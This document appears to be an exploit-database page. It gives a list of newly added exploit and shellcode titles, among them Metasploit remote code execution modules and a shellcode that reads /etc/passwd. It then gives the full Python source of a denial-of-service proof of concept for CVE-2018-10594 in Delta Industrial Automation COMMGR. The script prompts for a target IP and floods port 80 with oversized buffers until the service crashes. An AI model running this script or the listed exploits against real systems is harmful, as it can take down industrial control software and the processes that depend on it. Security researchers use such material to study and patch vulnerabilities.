
11 changes to exploits/shellcodes

Core FTP LE 2.2 - Buffer Overflow (PoC)
SIPp 3.6 - Local Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection
FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
Dolibarr ERP CRM < 7.0.3 - PHP Code Injection
Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
34 lines
No EOL
905 B
Python
Executable file
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
# - Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
# COMMGR Version 1.08 and prior.
# DVPSimulator EH2, EH3, ES2, SE, SS2
# AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594

#Run exploit, result DOS

import socket


ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip,80)))
        print "[+] Connection %d" % i
        crash1 = "\x41"*4412 +"\X42"*1000
        sarr[i].send(crash1+'\r\n')
        i+=1
    except socket.error:
        print "[*] Server crashed "
        raw_input()
        break